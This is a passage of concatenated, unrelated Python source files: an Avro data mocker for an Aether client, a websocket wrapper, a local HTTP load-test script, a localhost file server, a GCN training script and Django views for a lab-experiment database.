new_record = self.get(set_id=_id)
self.parent.register(self.name, new_record)
return _id
def get(self, record_type="default", set_id=None):
# Creates a mock instance of this type
# wraps _get
if record_type is "default":
body = self._get(self.name)
if set_id:
body['id'] = set_id
self.created.append(body.get('id'))
return body
else:
return self._get(record_type)
def _get(self, name):
# actually compiles the instruction set for this type and returns the body
instructions = self.instructions.get(name)
if not instructions:
alt = self.parent.names.get(name)
instructions = self.instructions.get(alt)
if not instructions:
raise ValueError("No instructions for type %s" % name)
body = {}
for name, fn in instructions:
body[name] = fn()
return body
def gen(self, _type):
# generation of avro types
return self.type_methods.get(_type)
def gen_array(self, _type):
# generation of an array of any type
fn = self.gen(_type)
return MockFn(self._gen_array, [fn])
def _gen_array(self, fn):
size = choice(range(2, self.MAX_ARRAY_SIZE))
return [fn() for i in range(size)]
def gen_random_type(self, name=None, _types=None):
if _types is None:
_types = []
return MockFn(self._gen_random_type, [name, _types])
def _gen_random_type(self, name, types):
# picks on of the valid types available for the field and completes it
if name in self.required:
types = [i for i in types if i != "null"]
_type = choice(types)
fn = None
if isinstance(_type, dict):
if _type.get("type", None) != "array":
raise ValueError("unexpected type, %s" % _type.get('type'))
items = _type.get("items")
fn = self.gen_array(items)
return fn()
elif isinstance(_type, list):
if name in self.required:
_type = [i for i in _types if i != "null"]
_type = choice(_type)
if not _type in self.primative_types:
fn = self.gen_complex(_type)
else:
fn = self.gen(_type)
return fn()
def gen_complex(self, _type):
return MockFn(self._gen_complex, _type)
def _gen_complex(self, name):
# handles generation of associated types
try:
return self._get(name)
except ValueError as verr:
fn = self.gen("null")
return fn()
def gen_reference(self, name, _type, types):
# gets a reference to a foreign type
# usually triggers creation via the other types get_reference()
return MockFn(self._gen_reference, [name, _type, types])
def _gen_reference(self, name, _type, types):
if name in self.required:
types = [i for i in types if i != "null"]
chosen = choice(types)
if isinstance(chosen, str):
return self.parent.get_reference(_type)
else:
size = choice(range(2, self.MAX_ARRAY_SIZE))
return [self.get_reference(_type) for i in range(size)]
def ignore(self, property_name):
# turn off mocking for this property
self.ignored_properties.append(property_name)
def override_type(self, type_name, fn):
# provide an override method for an avro type
# fn is a MockFn object
self.type_methods[type_name] = fn
self.load()
def override_property(self, property_name, fn):
# overrides a property in this type by name with a new function
# for example instead of returning a random string for the name field, pick for a list
# fn is a MockFn object
self.property_methods[property_name] = fn
self.load()
def load(self):
# loads schema definition for this type
self.schema = json.loads(self.raw_schema)
if isinstance(self.schema, list):
for obj in self.schema:
self.parse(obj)
else:
self.parse(self.schema)
def parse(self, schema):
# looks at all the types called for
# matches simple types to type_methods
# stubs external calls to parent for linked types
name = schema.get("name")
instructions = []
fields = schema.get("fields", [])
for field in fields:
instructions.append(self._comprehend_field(field))
self.instructions[name] = instructions
for i in self.instructions[name]:
log.debug("Add instruction to %s : %s" % (name, i))
def _comprehend_field(self, field):
# picks apart an avro definition of a field and builds mocking functions
name = field.get("name")
if name in self.ignored_properties:
return (name, self.gen("null")) # Return null function and get out
try:
ref_type = field.get("jsonldPredicate").get("_id")
types = field.get('type')
# This is a reference property # TODO THIS MIGHT WANT TO BE sub_type
return (name, self.gen_reference(name, ref_type, types))
except Exception as err:
pass # This is simpler than checking to see if this is a dictionary?
if name in self.property_methods.keys():
# We have an explicit method for this
return (name, self.property_methods.get(name))
types = field.get("type")
if isinstance(types, str):
return (name, self.gen(types)) # Single type for this field
if name in self.restricted_types.keys(): # we've limited the types we want to mock
types = list(set(types).union(
set(self.restricted_types.get(name))))
return tuple([name, self.gen_random_type(name, types)])
def require(self, *property):
# Make a field never resolve to null (if null is an option)
if isinstance(property, list):
self.required.extend(property)
else:
self.required.append(property)
def restrict_type(self, property_name, allowable_types=None):
# some properties can be completed by multiple types of properties
# for example [null, int, string[]?].
# restrict_type allows you to chose a subset of the permitted types for mocking
if allowable_types is None:
allowable_types = []
self.restricted_types[property_name] = allowable_types
class MockFn(namedtuple("MockFn", ("fn", "args"))):
# Function wrapper class containing fn and args
def __new__(cls, fn, args=None):
this = super(MockFn, cls).__new__(cls, fn, args)
return this
def __call__(self):
if self.args and not isinstance(self.args, list):
return self.fn(self.args)
try: # This lets us get very duck-type-y with the passed functions
return self.fn(*self.args) if self.args else self.fn()
except TypeError as terr:
return self.fn(self.args)
class MockingManager(object):
def __init__(self, kernel_url, user, pw):
# connects to Aether and gets available schemas.
# constructs a DataMocker for each type
self.client = Client(kernel_url, user, pw)
self.types = {}
self.alias = {}
self.names = {}
self.project_schema = {}
self.schema_id = {}
self.type_count = {}
signal.signal(signal.SIGTERM, self.kill)
signal.signal(signal.SIGINT, self.kill)
self.load()
def get(self, _type):
if not _type in self.types.keys():
msg = "No schema for type %s" % (_type)
log.error(msg)
raise KeyError(msg)
return self.types.get(_type).get()
def get_reference(self, _type):
if not _type in self.types.keys():
msg = "No schema for type %s" % (_type)
log.error(msg)
raise KeyError(msg)
return self.types.get(_type).get_reference()
def kill(self, *args, **kwargs):
for name, mocker in self.types.items():
log.info("Stopping thread for %s" % name)
mocker.kill()
def register(self, name, payload=None):
# register an entity of type 'name'
# if no payload is passed, an appropriate one will be created
count = self.type_count.get(name, 0)
count += 1
self.type_count[name] = count
if not payload:
payload = self.types[name].get()
type_name = self.alias.get(name)
type_id = self.schema_id.get(name)
ps_id = self.project_schema.get(type_id)
data = self.payload_to_data(ps_id, payload)
try:
res = self.client.entities.create(data=data)
log.debug("Created instance # %s of type %s" % (self.type_count[name], name))
except AetherAPIException as err:
log.error("in creation of entity of type %s: %s" % (name, err))
return data
def payload_to_data(self, ps_id, payload):
# wraps data in expected aether jargon for submission
data = {
"id": payload['id'],
"payload": payload,
"projectschema": ps_id,
"mapping_revision": "None",
"status": "Publishable"
}
return data
def load(self):
# loads schemas and project schemas from aether client
log.debug("Loading schemas from Aether Kernel")
for schema in self.client.schemas.paginated('list'):
name = schema.name
log.debug("Loading schema for type %s \n%s" % (name, schema))
_id = schema.id
definition = schema.definition
if isinstance(definition, str):
definition = json.loads(definition)
if isinstance(definition, list):
full_name = [obj.get("name") for obj in definition if obj.get(
'name').endswith(name)][0]
else:
full_name = definition.get('name')
namespace = definition.get('namespace')
if namespace:
if not name in namespace:
full_name = namespace+"."+name
self.types[full_name] = DataMocker(
full_name, json.dumps(definition), self)
self.names[name] = full_name
self.names[full_name] = name
self.types[name] = self.types[full_name]
self.alias[full_name] = name
self.alias[name] = full_name
self.schema_id[name] = _id
self.schema_id[full_name] = _id
self.schema_id[_id] = name
for ps in self.client.projectschemas.paginated('list'):
schema_id = ps.schema
_id = ps.id
self.project_schema[schema_id] = _id
self.project_schema[_id] = schema_id
|
wss.py
|
from .base import BaseSocket
from ..util import Logger
import websocket
import threading
import json
import time
class WebSocketApiSocket(BaseSocket):
"""
Generic REST API call
"""
def __init__(self, id):
"""
Constructor
:param id: Socket id
"""
BaseSocket.__init__(self)
self.ws = None # Web socket
self.id = id
self.wst = None # Web socket thread
self._connecting = False
self._connected = False
self.on_message_handlers = []
self.on_open_handlers = []
self.on_close_handlers = []
self.on_error_handlers = []
def connect(self, url,
on_message_handler=None,
on_open_handler=None,
on_close_handler=None,
on_error_handler=None,
reconnect_interval=10):
"""
:param url: Url link
:param on_message_handler: Message handler which take the message as
the first argument
:param on_open_handler: Socket open handler which take the socket as
the first argument
:param on_close_handler: Socket close handler which take the socket as
the first argument
:param on_error_handler: Socket error handler which take the socket as
the first argument and the error as the second
argument
:param reconnect_interval: The time interval for reconnection
"""
Logger.info(self.__class__.__name__, "Connecting to socket <%s>..." % self.id)
if on_message_handler is not None:
self.on_message_handlers.append(on_message_handler)
if on_open_handler is not None:
self.on_open_handlers.append(on_open_handler)
if on_close_handler is not None:
self.on_close_handlers.append(on_close_handler)
if on_error_handler is not None:
self.on_error_handlers.append(on_error_handler)
if not self._connecting and not self._connected:
self._connecting = True
self.ws = websocket.WebSocketApp(url,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error)
self.wst = threading.Thread(target=lambda: self.__start(reconnect_interval=reconnect_interval))
self.wst.start()
return self.wst
def send(self, msg):
"""
Send message
:param msg: Message
:return:
"""
self.ws.send(msg)
def __start(self, reconnect_interval=10):
while True:
self.ws.run_forever()
Logger.info(self.__class__.__name__, "Socket <%s> is going to reconnect..." % self.id)
time.sleep(reconnect_interval)
def __on_message(self, ws, m):
m = json.loads(m)
if len(self.on_message_handlers) > 0:
for handler in self.on_message_handlers:
handler(m)
def __on_open(self, ws):
Logger.info(self.__class__.__name__, "Socket <%s> is opened." % self.id)
self._connected = True
if len(self.on_open_handlers) > 0:
for handler in self.on_open_handlers:
handler(ws)
def __on_close(self, ws):
Logger.info(self.__class__.__name__, "Socket <%s> is closed." % self.id)
self._connecting = False
self._connected = False
if len(self.on_close_handlers) > 0:
for handler in self.on_close_handlers:
handler(ws)
def __on_error(self, ws, error):
Logger.info(self.__class__.__name__, "Socket <%s> error:\n %s" % (self.id, error))
if len(self.on_error_handlers) > 0:
for handler in self.on_error_handlers:
handler(ws, error)
if __name__ == '__main__':
Logger.init_log()
socket = WebSocketApiClient('test')
socket.connect('ws://localhost', reconnect_interval=1)
time.sleep(10)
|
httprw.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests, random
import moment
import multiprocessing
from httpinit import generateUser
para_list = []
for i in range(0,1000):
para_list.append(generateUser(i))
post_url = "http://192.168.99.100:4000/user/"
numprocess = 100
def sendrwrequest():
st = moment.now().epoch()
for i in range(0,100):
j = random.randint(0,999)
action = ["read", "write"][(random.random() > 0.86)]
if(action == "read"):
r = requests.get(post_url+para_list[j]["_id"])
else:
#r = requests.put(post_url+para_list[i]["_id"],para_list[i])
r = requests.put(post_url+para_list[j]["_id"],para_list[j])
#print r.text
#print r.status_code
if(r.status_code != 200 or "status" in r.json()):
print i
print "read write failed"
break
runt = moment.now().epoch() - st
print runt
plist = []
for i in range (0,numprocess):
p = multiprocessing.Process(target = sendrwrequest)
plist.append(p)
for i in range (0,numprocess):
plist[i].start()
|
server.py
|
# -*- coding: utf-8 -*-
import os
import posixpath
import threading
from http.server import SimpleHTTPRequestHandler
from socketserver import ThreadingTCPServer
from urllib.parse import unquote
HERE = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data")
class SimpleHTTPRequestHandlerHere(SimpleHTTPRequestHandler, object):
def send_head(self):
if self.client_address[0] != "127.0.0.1":
self.send_error(
401, "Unauthorized", "No permission -- see authorization schemes"
)
return None
else:
return super(SimpleHTTPRequestHandlerHere, self).send_head()
def translate_path(self, path):
"""
Ignore the actual request path and just serve a specific folder.
Mostly same as py3.6 source, replacing "path = os.getcwd()" with HERE so
that the directory list or file transfers are relative to HERE rather
than the current working directory.
"""
# abandon query parameters
path = path.split("?", 1)[0]
path = path.split("#", 1)[0]
# Don"t forget explicit trailing slash when normalizing. Issue17324
trailing_slash = path.rstrip().endswith("/")
try:
path = unquote(path, errors="surrogatepass")
except UnicodeDecodeError:
path = unquote(path)
except TypeError: # py2 only accepts one param.
path = unquote(path)
path = posixpath.normpath(path)
words = path.split("/")
words = filter(None, words)
path = HERE # edited
for word in words:
if os.path.dirname(word) or word in (os.curdir, os.pardir):
# Ignore components that are not a simple file/directory name
continue
path = os.path.join(path, word)
if trailing_slash:
path += "/"
return path
def log_message(self, format, *args):
pass # be quiet
class ThreadingServerInThread:
"""
Context manager for running a threading http server in a thread.
Since the Thread is not using "daemon=True", it will keep Python running
until the context manager exits, which means until request completion.
"""
def __init__(self, port=8000):
self._server_address = ("127.0.0.1", port)
self._handler = SimpleHTTPRequestHandlerHere
self.httpd = ThreadingTCPServer(
self._server_address, self._handler, bind_and_activate=False
)
def _bind_and_activate(self):
try:
self.httpd.server_bind()
self.httpd.server_activate()
except Exception as e:
self.httpd.server_close()
raise e
def start(self):
self._bind_and_activate()
thread = threading.Thread(target=self.httpd.serve_forever)
thread.start()
def stop(self):
self.httpd.shutdown()
self.httpd.server_close()
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
|
train_gcn.py
|
import argparse
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
from dgl.nn.pytorch import GraphConv
import dgl.multiprocessing as mp
from torch.nn.parallel import DistributedDataParallel
import os
import sys
import samgraph.torch as sam
import datetime
from common_config import *
class GCN(nn.Module):
def __init__(self,
in_feats,
n_hidden,
n_classes,
n_layers,
activation,
dropout):
super(GCN, self).__init__()
self.layers = nn.ModuleList()
# input layer
self.layers.append(
GraphConv(in_feats, n_hidden, activation=activation, allow_zero_in_degree=True))
# hidden layers
for _ in range(n_layers - 2):
self.layers.append(
GraphConv(n_hidden, n_hidden, activation=activation, allow_zero_in_degree=True))
# output layer
self.layers.append(
GraphConv(n_hidden, n_classes, allow_zero_in_degree=True))
self.dropout = nn.Dropout(p=dropout)
def forward(self, blocks, features):
h = features
for i, layer in enumerate(self.layers):
if i != 0:
h = self.dropout(h)
h = layer(blocks[i], h)
return h
def parse_args(default_run_config):
argparser = argparse.ArgumentParser("GCN Training")
add_common_arguments(argparser, default_run_config)
argparser.add_argument('--fanout', nargs='+',
type=int, default=default_run_config['fanout'])
argparser.add_argument('--lr', type=float,
default=default_run_config['lr'])
argparser.add_argument('--dropout', type=float,
default=default_run_config['dropout'])
argparser.add_argument('--weight-decay', type=float,
default=default_run_config['weight_decay'])
return vars(argparser.parse_args())
def get_run_config():
run_config = {}
run_config.update(get_default_common_config(run_mode=RunMode.SGNN))
run_config['sample_type'] = 'khop2'
run_config['fanout'] = [5, 10, 15]
run_config['lr'] = 0.003
run_config['dropout'] = 0.5
run_config['weight_decay'] = 0.0005
run_config.update(parse_args(run_config))
process_common_config(run_config)
assert(run_config['arch'] == 'arch6')
assert(run_config['sample_type'] != 'random_walk')
run_config['num_fanout'] = run_config['num_layer'] = len(
run_config['fanout'])
print_run_config(run_config)
return run_config
def run_init(run_config):
sam.config(run_config)
sam.data_init()
if run_config['validate_configs']:
sys.exit()
def run(worker_id, run_config):
num_worker = run_config['num_worker']
global_barrier = run_config['global_barrier']
ctx = run_config['workers'][worker_id]
device = torch.device(ctx)
print('[Worker {:d}/{:d}] Started with PID {:d}({:s})'.format(
worker_id, num_worker, os.getpid(), torch.cuda.get_device_name(ctx)))
sam.sample_init(worker_id, ctx)
sam.train_init(worker_id, ctx)
if num_worker > 1:
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip='127.0.0.1', master_port='12345')
world_size = num_worker
torch.distributed.init_process_group(backend="nccl",
init_method=dist_init_method,
world_size=world_size,
rank=worker_id,
timeout=datetime.timedelta(seconds=get_default_timeout()))
in_feat = sam.feat_dim()
num_class = sam.num_class()
num_layer = run_config['num_layer']
model = GCN(in_feat, run_config['num_hidden'], num_class,
num_layer, F.relu, run_config['dropout'])
model = model.to(device)
if num_worker > 1:
model = DistributedDataParallel(
model, device_ids=[device], output_device=device)
loss_fcn = nn.CrossEntropyLoss()
loss_fcn = loss_fcn.to(device)
optimizer = optim.Adam(
model.parameters(), lr=run_config['lr'], weight_decay=run_config['weight_decay'])
num_epoch = sam.num_epoch()
num_step = sam.num_local_step()
model.train()
epoch_sample_total_times = []
epoch_sample_times = []
epoch_get_cache_miss_index_times = []
epoch_copy_times = []
epoch_convert_times = []
epoch_train_times = []
epoch_total_times_python = []
epoch_train_total_times_profiler = []
epoch_cache_hit_rates = []
copy_times = []
convert_times = []
train_times = []
total_times = []
# run start barrier
global_barrier.wait()
print('[Worker {:d}] run for {:d} epochs with {:d} steps'.format(
worker_id, num_epoch, num_step))
run_start = time.time()
for epoch in range(num_epoch):
# epoch start barrier
global_barrier.wait()
tic = time.time()
for step in range(worker_id, num_step * num_worker, num_worker):
t0 = time.time()
sam.sample_once()
batch_key = sam.get_next_batch()
t1 = time.time()
blocks, batch_input, batch_label = sam.get_dgl_blocks(
batch_key, num_layer)
t2 = time.time()
# Compute loss and prediction
batch_pred = model(blocks, batch_input)
loss = loss_fcn(batch_pred, batch_label)
optimizer.zero_grad()
loss.backward()
optimizer.step()
event_sync()
batch_input = None
batch_label = None
blocks = None
t3 = time.time()
copy_time = sam.get_log_step_value(epoch, step, sam.kLogL1CopyTime)
convert_time = t2 - t1
train_time = t3 - t2
total_time = t3 - t1
sam.log_step(epoch, step, sam.kLogL1TrainTime, train_time)
sam.log_step(epoch, step, sam.kLogL1ConvertTime, convert_time)
sam.log_epoch_add(epoch, sam.kLogEpochConvertTime, convert_time)
sam.log_epoch_add(epoch, sam.kLogEpochTrainTime, train_time)
sam.log_epoch_add(epoch, sam.kLogEpochTotalTime, total_time)
copy_times.append(copy_time)
convert_times.append(convert_time)
train_times.append(train_time)
total_times.append(total_time)
sam.report_step_average(epoch, step)
event_sync()
# sync the train workers
if num_worker > 1:
torch.distributed.barrier()
toc = time.time()
epoch_total_times_python.append(toc - tic)
# epoch end barrier
global_barrier.wait()
feat_nbytes = sam.get_log_epoch_value(
epoch, sam.kLogEpochFeatureBytes)
miss_nbytes = sam.get_log_epoch_value(
epoch, sam.kLogEpochMissBytes)
epoch_cache_hit_rates.append(
(feat_nbytes - miss_nbytes) / feat_nbytes)
epoch_sample_total_times.append(
sam.get_log_epoch_value(epoch, sam.kLogEpochSampleTotalTime)
)
epoch_sample_times.append(
sam.get_log_epoch_value(epoch, sam.kLogEpochSampleTime)
)
epoch_get_cache_miss_index_times.append(
sam.get_log_epoch_value(
epoch, sam.KLogEpochSampleGetCacheMissIndexTime)
)
epoch_copy_times.append(
sam.get_log_epoch_value(epoch, sam.kLogEpochCopyTime))
epoch_convert_times.append(
sam.get_log_epoch_value(epoch, sam.kLogEpochConvertTime))
epoch_train_times.append(
sam.get_log_epoch_value(epoch, sam.kLogEpochTrainTime))
epoch_train_total_times_profiler.append(
sam.get_log_epoch_value(epoch, sam.kLogEpochTotalTime))
if worker_id == 0:
print('Epoch {:05d} | Epoch Time {:.4f} | Sample {:.4f} | Copy {:.4f} | Total Train(Profiler) {:.4f}'.format(
epoch, epoch_total_times_python[-1], epoch_sample_total_times[-1], epoch_copy_times[-1], epoch_train_total_times_profiler[-1]))
# sync the train workers
if num_worker > 1:
torch.distributed.barrier()
# run end barrier
global_barrier.wait()
run_end = time.time()
print('[Train Worker {:d}] Avg Epoch {:.4f} | Sample {:.4f} | Copy {:.4f} | Train Total (Profiler) {:.4f}'.format(
worker_id, np.mean(epoch_total_times_python[1:]), np.mean(epoch_sample_total_times[1:]), np.mean(epoch_copy_times[1:]), np.mean(epoch_train_total_times_profiler[1:])))
global_barrier.wait() # barrier for pretty print
if worker_id == 0:
test_result = []
test_result.append(('sample_time', np.mean(epoch_sample_times[1:])))
test_result.append(('get_cache_miss_index_time', np.mean(
epoch_get_cache_miss_index_times[1:])))
test_result.append(
('epoch_time:sample_total', np.mean(epoch_sample_total_times[1:])))
test_result.append(('epoch_time:copy_time',
np.mean(epoch_copy_times[1:])))
test_result.append(('convert_time', np.mean(epoch_convert_times[1:])))
test_result.append(('train_time', np.mean(epoch_train_times[1:])))
test_result.append(('epoch_time:train_total', np.mean(
epoch_train_total_times_profiler[1:])))
test_result.append(
('cache_percentage', run_config['cache_percentage']))
test_result.append(('cache_hit_rate', np.mean(
epoch_cache_hit_rates[1:])))
test_result.append(
('epoch_time:total', np.mean(epoch_total_times_python[1:])))
test_result.append(('run_time', run_end - run_start))
for k, v in test_result:
print('test_result:{:}={:.2f}'.format(k, v))
# sam.dump_trace()
sam.shutdown()
if __name__ == '__main__':
run_config = get_run_config()
run_init(run_config)
num_worker = run_config['num_worker']
# global barrier is used to sync all the sample workers and train workers
run_config['global_barrier'] = mp.Barrier(
num_worker, timeout=get_default_timeout())
if num_worker == 1:
run(0, run_config)
else:
workers = []
# sample processes
for worker_id in range(num_worker):
p = mp.Process(target=run, args=(worker_id, run_config))
p.start()
workers.append(p)
ret = sam.wait_one_child()
if ret != 0:
for p in workers:
p.kill()
for p in workers:
p.join()
if ret != 0:
sys.exit(1)
|
views.py
|
from django.shortcuts import render
import numpy as np
import os
from Lab_Misc import General
from Lab_Misc.General import *
from .Generate import CreateAndUpdate
import webbrowser
from itertools import chain
import threading
import subprocess
from Exp_Main import Sort_Videos
from django.templatetags.static import static
from django.shortcuts import redirect
from django.http import HttpResponse
from django.http import HttpResponseRedirect
#import Exp_Main.update_Exp as update_Exp
from django_tables2 import SingleTableView
from django_filters.views import FilterView
from django_tables2.views import SingleTableMixin
from django.core.files.storage import default_storage
from .models import ExpPath, Group
from Analysis.models import Comparison
from .forms import New_entry_form
from .models import ExpBase, Observation, ObservationHierarchy
from Exp_Sub.models import ExpBase as ExpBaseSub
from Exp_Sub.models import ExpPath as ExpPathSub
from .models import OCA as OCA_model
from .models import RLD as RLD_model
from .tables import ExpBase_table, get_Table, Observation_table, Group_table, Comparison_table
from .filters import OCA_filter, RLD_filter, ExpBase_filter, get_Filter
from Lab_Misc.forms import get_Form
from .filters import *
from django.apps import apps
from django.urls import reverse_lazy
from bootstrap_modal_forms.generic import (BSModalLoginView,
BSModalCreateView,
BSModalUpdateView,
BSModalReadView,
BSModalDeleteView)
def index(request):
return render(request, 'templates/albums.html')
def Success_return(request):
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))#redirects to previous url
def Comparisons(request):
model = Comparison.objects.all()
context = {'table': Comparison_table(model)}
return render(request, 'Comparison.html', context)
def Generate(request):
cwd = os.getcwd()
Gen = CreateAndUpdate()
if request.method == 'POST' and 'Generate_Names' in request.POST:
Report_Path = Gen.Generate_Names()
path = os.path.join(cwd, Report_Path)
print(path)
webbrowser.open_new(r'' + path)
if request.method == 'POST' and 'Generate_Entries' in request.POST:
try:
Sort_Videos.Sort_RSD()
except:
pass
try:
Sort_Videos.Sort_CON()
except:
pass
Report_Paths = Gen.Generate_Entries()
for Report_Path in Report_Paths:
path = os.path.join(cwd, Report_Path)
print(path)
webbrowser.open_new(r'' + path)
if request.method == 'POST' and 'ConnectFilesToExpMain' in request.POST:
Report_Path = Gen.ConnectFilesToExpMain()
path = os.path.join(cwd, Report_Path)
webbrowser.open_new(r'' + path)
return render(request = request,
template_name='Generate.html',)
def Observation_pk(request, pk):
model = ObservationHierarchy.objects.all()
sel_obs = model.get(id = pk)
context = {'Observations': model}
context['table'] = Observation_table(sel_obs.Observation.all())
context['obs_pk'] = pk
context['sel_obs'] = sel_obs
return render(request, 'observations_single.html', context)
def observations(request):
model = ObservationHierarchy.objects.all()
context = {'Observations': model}
context['table'] = Observation_table(Observation.objects.all())
return render(request, 'observations.html', context)
def group_pk(request, pk):
model = Group.objects.all()
sel_obs = model.get(id = pk)
exp_ids = sel_obs.ExpBase.all().values_list('id', flat=True)
context = {'Groups': model}
table_class = get_Table('SFG')
context['table'] = table_class(SFG.objects.filter(id__in = exp_ids))
context['obs_pk'] = pk
context['sel_obs'] = sel_obs
return render(request, 'groups_single.html', context)
def groups(request):
model = Group.objects.all()
context = {'Groups': model}
context['table'] = Group_table(Group.objects.all())
return render(request, 'groups.html', context)
# def update_Exp_view(request):
# if request.method == 'POST' and 'update_Exp' in request.POST:
# get_old_DB = update_Exp.get_old_DB()
# get_old_DB.set_Observation()
# if request.method == 'POST' and 'Con_sub_Exp' in request.POST:
# connect = update_Exp.connect_sub()
# connect.LSP_OCA()
# return render(request = request,
# template_name='update_Exp.html',)
class Exp_table_view(SingleTableMixin, FilterView):
def get_table_class(self, **kwargs):
model_name = self.kwargs['Exp_name']
table_class = get_Table(model_name)
return table_class
def get_queryset(self, **kwargs):
model_name = self.kwargs['Exp_name']
model = apps.get_model('Exp_Main', model_name)
return model.objects.all()
def get_filterset_class(self, **kwargs):
model_name = self.kwargs['Exp_name']
filterset_class = get_Filter(model_name)
return filterset_class
table_pagination = {"per_page": 50}
template_name = 'Show_sample.html'
class Prior_Exp(SingleTableMixin, FilterView):
def get_queryset(self, **kwargs):
Main_id = self.kwargs['pk']
queryset = ExpBase.objects.filter(Sample_name = ExpBase.objects.get(id = Main_id).Sample_name,
Date_time__lte = ExpBase.objects.get(id = Main_id).Date_time)
return queryset
queryset = ExpBase.objects.filter(group__isnull = True)
table = ExpBase_table(queryset)
table_class = ExpBase_table
table_pagination = {"per_page": 50}
template_name = 'Show_sample.html'
filterset_class = ExpBase_filter
class Samples_table_view(SingleTableMixin, FilterView):
queryset = ExpBase.objects.filter(group__isnull = True)
table = ExpBase_table(queryset)
table_class = ExpBase_table
table_pagination = {"per_page": 50}
template_name = 'Show_sample.html'
filterset_class = ExpBase_filter
class Create_new_entry(BSModalCreateView):
template_name = 'Modal/create_entry.html'
form_class = get_Form('Exp_Main', 'HED')
def get_model_name(self, group_name, model_name, pk):
if (model_name == 'None') & (group_name == 'Exp_Main'):
curr_entry = ExpBase.objects.get(pk = pk)
curr_exp = ExpPath.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
elif (model_name == 'None') & (group_name == 'Exp_Sub'):
curr_entry = ExpBaseSub.objects.get(pk = pk)
curr_exp = ExpPathSub.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
else:
name = model_name
return name
def get_form_class(self, **kwargs):
pk = self.kwargs['pk']
model_name = self.kwargs['model']
group_name = self.kwargs['group']
model_name = self.get_model_name(group_name, model_name, pk)
formset_class = get_Form(group_name, model_name)
return formset_class
def get_queryset(self, **kwargs):
pk = self.kwargs['pk']
model_name = self.kwargs['model']
group_name = self.kwargs['group']
model_name = self.get_model_name(group_name, model_name, pk)
curr_model = apps.get_model(group_name, model_name)
self.curr_entry = curr_model.objects.get(pk = pk)
queryset = curr_model.objects.all()
return queryset
success_message = 'Success: Book was created.'
success_url = reverse_lazy('Success_return')
class Update_entry(BSModalUpdateView):
model = ExpBase
template_name = 'Modal/update_entry.html'
form_class = get_Form('Exp_Main', 'OCA')
def get_model_name(self, group_name, model_name, pk):
if (model_name == 'None') & (group_name == 'Exp_Main'):
curr_entry = ExpBase.objects.get(pk = pk)
curr_exp = ExpPath.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
elif (model_name == 'None') & (group_name == 'Exp_Sub'):
curr_entry = ExpBaseSub.objects.get(pk = pk)
curr_exp = ExpPathSub.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
else:
name = model_name
return name
def get_form_class(self, **kwargs):
pk = self.kwargs['pk']
model_name = self.kwargs['model']
group_name = self.kwargs['group']
model_name = self.get_model_name(group_name, model_name, pk)
formset_class = get_Form(group_name, model_name)
return formset_class
def get_queryset(self, **kwargs):
pk = self.kwargs['pk']
model_name = self.kwargs['model']
group_name = self.kwargs['group']
model_name = self.get_model_name(group_name, model_name, pk)
curr_model = apps.get_model(group_name, model_name)
self.curr_entry = curr_model.objects.get(pk = pk)
queryset = curr_model.objects.all()
return queryset
success_message = 'Success: Book was updated.'
success_url = reverse_lazy('Success_return')
class Read_entry(BSModalReadView):
template_name = 'Modal/read_entry.html'
curr_entry = ExpBase.objects.first()
context_object_name = 'ExpBase'
model = ExpBase
def get_context_data(self,*args, **kwargs):
context = super(Read_entry, self).get_context_data(*args,**kwargs)
pk = self.kwargs['pk']
entry = General.get_in_full_model(pk)
try:
if entry.Device.Abbrev == 'RSD':
Drops = range(1,entry.Script.number_of_cycles+1)
Drop_names = ['All']
for Drop in Drops:
Drop_names.append('Drop_'+str(Drop))
context['Drops'] = Drop_names
except:
context['Drops'] = ['only']
return context
def get_model_name(self, group_name, model_name, pk):
if (model_name == 'None') & (group_name == 'Exp_Main'):
curr_entry = ExpBase.objects.get(pk = pk)
curr_exp = ExpPath.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
elif (model_name == 'None') & (group_name == 'Exp_Sub'):
curr_entry = ExpBaseSub.objects.get(pk = pk)
curr_exp = ExpPathSub.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
else:
name = model_name
return name
def template_path_exists(self, template_path):
return default_storage.exists(os.path.join('Exp_Main/templates', template_path))
def get_queryset(self, **kwargs):
pk = self.kwargs['pk']
model_name = self.kwargs['model']
group_name = self.kwargs['group']
model_name = self.get_model_name(group_name, model_name, pk)
curr_model = apps.get_model(group_name, model_name)
self.curr_entry = curr_model.objects.get(pk = pk)
queryset = curr_model.objects.all()
template_name = 'Modal/Experiments/' + str(model_name) + '.html'
if str(model_name) == 'CON':
template_name = 'Modal/Experiments/' + str(model_name) + '_.html'
if self.template_path_exists(template_name):
self.template_name = template_name
return queryset
def post(self, request, *args, **kwargs):
def start_drop_ana():
cwd = os.getcwd()
path = 'Private\\Sessile.drop.analysis\\'
subprocess.call(['python', 'Private/Sessile.drop.analysis/QT_sessile_drop_analysis.py', Link_to_vid, chosen_drop, path])
os.chdir(cwd)
def start_compress_vid():
cwd = os.getcwd()
subprocess.call(['python', 'Private/Sessile.drop.analysis/video_compression.py', Link_to_vid, chosen_drop, compression_level])
os.chdir(cwd)
pk = self.kwargs['pk']
curr_entry = ExpBase.objects.get(pk = pk)
curr_exp = ExpPath.objects.get(Name = str(curr_entry.Device))
curr_model = apps.get_model('Exp_Main', str(curr_exp.Abbrev))
self.curr_entry = curr_model.objects.get(pk = pk)
if os.environ['DJANGO_SETTINGS_MODULE'] == 'Private.settings':
if request.method == 'POST' and 'OpenVideoPath' in request.POST:
Folder_path = os.path.join(get_BasePath(), self.curr_entry.Link_Video)
Folder_path = Folder_path.replace(',', '","')
subprocess.Popen(r'explorer /select,' + Folder_path)
if request.method == 'POST' and 'Run_compress_vid' in request.POST:
chosen_drop=request.POST.get('Drop_choose')
Link_to_vid = os.path.join(get_BasePath(), self.curr_entry.Link)
compression_level = '1'
x = threading.Thread(target=start_compress_vid)
x.start()
if request.method == 'POST' and 'Run_RSD_Analysis' in request.POST:
